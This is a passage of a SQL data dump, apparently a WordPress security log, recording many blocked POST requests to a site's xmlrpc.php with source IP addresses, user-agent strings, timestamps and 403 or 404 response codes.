NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','0BTidHDKNwvu9ak7VrnxtMge',0,1681814081.4016,678,'','POST',403,0,515,0,1,'',0),('192.99.18.113',3227718257,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','4lKXaBgpzryWS5mfoCQE0YGq',0,1681814075.0957,604,'','POST',403,0,515,0,1,'',0),('31.214.175.10',534163210,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','uUGyt5XIMNWFY2rhvlnxROAw',0,1681814065.6258,584,'','POST',403,0,515,0,1,'',0),('82.165.86.60',1386567228,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','9Gz2KvHLJiIFbTfZn61RyBEP',0,1681814064.4084,586,'','POST',403,0,515,0,1,'',0),('82.165.86.58',1386567226,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','EVZbh8SC45rfdDt0K7xNP1iQ',0,1681814057.1607,618,'','POST',403,0,515,0,1,'',0),('69.49.247.110',1160902510,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','UqVzOn0rkGIw3BZh9Qjia1Ab',0,1681814052.7388,616,'','POST',403,0,515,0,1,'',0),('68.178.224.133',1152573573,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','zKw1DAPFGh7fgHoXUuRyj8EI',0,1681814050.0688,597,'','POST',403,0,515,0,1,'',0),('43.155.103.11',731604747,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','2s8MPWuzwUpiRQGkCINl3AVx',0,1681814046.6004,614,'','POST',403,0,515,0,1,'',0),('103.255.237.7',1744825607,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','6Qop5CaAguL3dB4jEvN0UWYh',0,1681814043.9384,632,'','POST',403,0,515,0,1,'',0),('217.199.187.74',3653745482,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','vJmb8VXiqlQtaIBe9G5rpUZM',0,1681814036.7261,1672,'','POST',403,0,515,0,1,'',0),('103.231.91.59',1743215419,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','mr1upaRj9V8yW4qI5C2YcJ7b',0,1681812819.4010,4623,'','POST',403,0,515,0,1,'',0),('185.156.174.115',3114053235,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ZfaUECOgz8NbF6AkJDXq5Std',0,1681811491.0541,3572,'','POST',403,0,515,0,1,'',0),('217.26.127.250',3642392570,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','ti9SmjYUvAxyF6DanwruNb2z',0,1681825002.7545,595,'','POST',403,0,515,0,1,'',0),('192.99.19.65',3227718465,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','aI7EOnL2TDwkyloP3A6WFJR8',0,1681824997.4944,666,'','POST',403,0,515,0,1,'',0),('5.9.59.22',84491030,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','DGwWfbdHVNzFRyi38mjgqPx7',0,1681824993.0746,579,'','POST',403,0,515,0,1,'',0),('103.146.176.238',1737666798,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','FMQat72g6pGZhlKyw9dqnPO1',0,1681824989.0008,3778,'','POST',403,0,515,0,1,'',0),('89.201.167.100',1506387812,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','sILAFpZDao6OYr9nuqcyxC72',0,1681824990.5962,1787,'','POST',403,0,515,0,1,'',0),('217.138.195.27',3649749787,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','EjFdT2o7ZeRNVALHuwbYnqfh',0,1681824228.3957,738,'','POST',403,0,515,0,1,'',0),('80.88.87.150',1347966870,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:40.0) Gecko\\/20100101 Firefox\\/40.0\"}','aTNh6u0PlRHnVcgQKkOdDEZ2',0,1681821640.6710,640,'','POST',403,0,515,0,1,'',0),('45.162.229.147',765650323,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','JArE6wUc7HjWDpTuXqVmdZPi',0,1681822230.7251,3896,'','POST',403,0,515,0,1,'',0),('185.156.174.155',3114053275,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','aT4hYVQ6DNAXwI1OlbmjPs3z',0,1681821632.2295,564,'','POST',403,0,515,0,1,'',0),('173.212.199.147',2916403091,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','aDFq1A2uWJsRIBm0hxQHV7Kn',0,1681821619.7255,569,'','POST',403,0,515,0,1,'',0),('122.201.124.60',2060024892,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','D8biM1SBlf2O634gP7KQJXaq',0,1681821614.3349,614,'','POST',403,0,515,0,1,'',0),('45.204.8.76',768346188,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','WfHTj8Y1wtS5Zr6I3BRuiNJm',0,1681821606.7862,723,'','POST',403,0,515,0,1,'',0),('207.180.207.149',3484733333,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','iNT4zEvYjfJmOrQhn7kC0cWe',0,1681821601.7427,5185,'','POST',403,0,515,0,1,'',0),('194.187.251.115',3267099507,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','eQmwbYkvyKRPVBE7Mt6i8n2g',0,1681820217.8454,2879,'','POST',403,0,515,0,1,'',0),('185.9.19.107',3104379755,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','iKeaY64Ob1MuQv3IXsxZrphn',0,1681819242.7580,4031,'','POST',403,0,515,0,1,'',0),('5.255.98.122',100622970,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','Gw0OLvQ6tuC4bVdXfKoAYHyk',0,1681827917.3555,624,'','POST',403,0,515,0,1,'',0),('161.97.187.66',2707536706,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','nSVrexBUct4681I5GWjsJYvu',0,1681827912.5153,667,'','POST',403,0,515,0,1,'',0),('161.35.85.183',2703447479,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','O9C2zsB1xjut3pHr4K8WihA5',0,1681827907.6095,712,'','POST',403,0,515,0,1,'',0),('5.255.98.122',100622970,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','vfTr7R5A6tN201ijVDUxolzP',0,1681827898.9632,2189,'','POST',403,0,515,0,1,'',0),('82.165.86.47',1386567215,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','z06uF8kfC3NYct2AMRgSZVnr',0,1681827892.4096,1451,'','POST',403,0,515,0,1,'',0),('135.125.22.232',2273122024,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','WfvN7CSJaDliwPHQMbpt6yBx',0,1681827138.7402,1730,'','POST',403,0,515,0,1,'',0),('37.120.132.91',628655195,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ZBjISf3bG7LeiPrhAHlwDN8O',0,1681827733.9658,3601,'','POST',403,0,515,0,1,'',0),('148.251.20.250',2499482874,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','twLf5P3arQm9zMlHOsV0WBI7',0,1681827137.9681,2198,'','POST',403,0,515,0,1,'',0),('185.21.40.38',3105171494,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','K4ivDkWmwZIVMop0dqBgryTa',0,1681827137.9814,2103,'','POST',403,0,515,0,1,'',0),('170.10.162.9',2852823561,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','rO6JqE3RC7oVNPegyI9x5ltW',0,1681835731.6933,583,'','POST',403,0,515,0,1,'',0),('195.158.25.14',3281918222,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','WaKFkPcisMmuqX9QNfOh1tyU',0,1681835726.0071,580,'','POST',403,0,515,0,1,'',0),('139.59.29.179',2335907251,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','FAIqgU7HPtipTOu4lDn5YLMQ',0,1681835719.4400,1808,'','POST',403,0,515,0,1,'',0),('173.231.207.89',2917650265,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','qVfQsmBIPUtKGT2zAiyHvZEY',0,1681835719.1623,2030,'','POST',403,0,515,0,1,'',0),('184.168.96.211',3098042579,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','r6RLUj19B8qFyTmsouYCEPMg',0,1681835715.8706,3977,'','POST',403,0,515,0,1,'',0),('62.102.148.162',1046910114,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','wuT14rKHDivLzl3QBItnqm6s',0,1681834442.5777,3954,'','POST',403,0,515,0,1,'',0),('196.189.44.24',3300731928,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','Uyha7oQtTdfmSe1qj6PvAZ9B',0,1681842643.2299,647,'','POST',403,0,515,0,1,'',0),('74.208.57.65',1255160129,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','ISioUbJW8MlvBewKpn47uxky',0,1681842635.0542,684,'','POST',403,0,515,0,1,'',0),('14.225.192.104',249675880,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','DGKwVzWlL1ISvY4EZy6HstXT',0,1681842634.0715,993,'','POST',403,0,515,0,1,'',0),('62.171.133.125',1051428221,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','nTQEc9uXvgFiLxsef5KH2ojz',0,1681842633.4659,820,'','POST',403,0,515,0,1,'',0),('192.99.19.65',3227718465,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','hcDR2yGEOub4UWge37qaPLQv',0,1681842626.8937,549,'','POST',403,0,515,0,1,'',0),('148.72.232.65',2487806017,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','M5XPg7GJZT2KkWp1IBmof6a0',0,1681842621.1528,609,'','POST',403,0,515,0,1,'',0),('198.71.235.55',3326602039,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','DsLd9U7AFqrnjcwIleyQmtGh',0,1681842615.8906,3978,'','POST',403,0,515,0,1,'',0),('196.189.44.24',3300731928,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:40.0) Gecko\\/20100101 Firefox\\/40.0\"}','j4Io7lGh2KZvV1X9EbMUTRfO',0,1681842617.8134,1784,'','POST',403,0,515,0,1,'',0),('109.234.164.49',1844094001,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','2PQlJEBDrRpzgXtcKeYdNuLi',0,1681840820.3353,637,'','POST',403,0,515,0,1,'',0),('103.179.190.218',1739833050,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','29hFlx7arRCm8wo4uzVEyjiO',0,1681840814.8307,647,'','POST',403,0,515,0,1,'',0),('45.204.8.76',768346188,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','VHTKbZmPIA24guEheJSaGXpi',0,1681840805.7711,1899,'','POST',403,0,515,0,1,'',0),('188.34.157.224',3156385248,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','ZUEgindq4jQT67WsKIX8FJYy',0,1681849374.7461,706,'','POST',403,0,515,0,1,'',0),('128.199.67.142',2160542606,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','y5Uvrkd0mhxOpH6a94lRQKFS',0,1681849377.5007,592,'','POST',403,0,515,0,1,'',0),('161.97.120.186',2707519674,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','TJiGfMlBPrEwWY75mchtsnAo',0,1681849370.7509,625,'','POST',403,0,515,0,1,'',0),('64.227.122.94',1088649822,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','U4s2wSdKzm6q1LtpkPiBIDJl',0,1681849366.7756,3776,'','POST',403,0,515,0,1,'',0),('72.167.125.153',1218936217,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','eUC2qDTXcwydK0QSJ9IrnoAp',0,1681849368.0211,1830,'','POST',403,0,515,0,1,'',0),('213.152.187.195',3583556547,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Jpk9sfbhEUxGvQMuND3Pw0R6',0,1681848871.1887,4963,'','POST',403,0,515,0,1,'',0),('185.200.116.131',3116921987,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','q8B4h72XFVQyd0Z9ToLYO3ag',0,1681846950.5755,3574,'','POST',403,0,515,0,1,'',0),('91.207.57.115',1540307315,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','CuB0moKb3dLzJp64gXwPiZR8',0,1681846404.5490,3738,'','POST',403,0,515,0,1,'',0),('161.35.85.183',2703447479,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','wjnNQW21U8zeBmYSR9COhk0g',0,1681852633.6232,1238,'','POST',403,0,515,0,1,'',0),('217.26.127.250',3642392570,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','n6UyaHPAqkMeQwDsXJEGImT2',0,1681854226.7475,4079,'','POST',403,0,515,0,1,'',0),('122.201.124.60',2060024892,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','68fJnzjCr152L0VOPAElBSqg',0,1681852626.4916,623,'','POST',403,0,515,0,1,'',0),('161.97.120.186',2707519674,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','ZNAgIk5bVEBm8zKul0dy3DrL',0,1681852625.7251,570,'','POST',403,0,515,0,1,'',0),('108.170.27.202',1823087562,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','1zYFVLSCe9m8i3NPkoJUKudf',0,1681852622.6404,605,'','POST',403,0,515,0,1,'',0),('51.195.176.80',868462672,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','lYyuFOXUn8kp5aZ0wGtrA3QH',0,1681852617.8429,597,'','POST',403,0,515,0,1,'',0),('91.225.138.200',1541507784,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','mDlsU8SGnRdzYKpyQJEt3VFc',0,1681852613.9486,669,'','POST',403,0,515,0,1,'',0),('140.210.206.84',2362625620,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','X281lrIAP7hZRE5mLcQBKzwS',0,1681852610.0417,3629,'','POST',403,0,515,0,1,'',0),('103.211.219.49',1741937457,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','FjY9rAK0fDBNLcmUx2uopezq',0,1681858005.4769,4664,'','POST',403,0,515,0,1,'',0),('82.165.86.58',1386567226,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','aBi47fOeTZdqbksDzW9nPp82',0,1681858002.9432,3630,'','POST',403,0,515,0,1,'',0),('68.178.228.199',1152574663,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','vRqUijIShJxc3820pYkXfKT6',0,1681857997.5939,578,'','POST',403,0,515,0,1,'',0),('139.59.25.27',2335906075,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','DzMtHqF0J6NjwLybGd4T58iK',0,1681857988.0680,3993,'','POST',403,0,515,0,1,'',0),('103.42.56.253',1730820349,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','NKVhpRaiw91jzsyDXFlrEnvI',0,1681857989.7531,1862,'','POST',403,0,515,0,1,'',0),('199.249.230.47',3355043375,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','pAvnPBd1axVS8zGT7LiRfotN',0,1681857544.9831,670,'','POST',403,0,515,0,1,'',0),('185.206.225.59',3117343035,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','4DsvbEdq6tpV5oxQkuH8i7NU',0,1681857225.1608,1580,'','POST',403,0,515,0,1,'',0),('80.244.168.40',1358211112,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','35Jym1Qc8L24irDFMKxNqUdY',0,1681875252.7875,2067,'','POST',403,0,515,0,1,'',0),('217.26.127.250',3642392570,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','y6j3sFi8e2oXvIJExkAcmrpC',0,1681875248.2652,404,'','POST',404,0,515,0,1,'',0),('217.26.127.250',3642392570,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','m57V8XNCe9luzA2pb6Ur3HiQ',0,1681875244.8035,408,'','POST',404,0,515,0,1,'',0),('34.87.13.139',576130443,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','9DKLkzN1xemSnsvTHAc3t0by',0,1681875235.1202,597,'','POST',403,0,515,0,1,'',0),('217.75.193.118',3645620598,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','xgcyPTUChf7Z92iSEVkaKAvu',0,1681875230.7643,1005,'','POST',403,0,515,0,1,'',0),('5.9.59.22',84491030,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','EnCI87DZLuv4jq6wpiyeQUNH',0,1681875225.4510,3703,'','POST',403,0,515,0,1,'',0),('217.75.193.118',3645620598,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 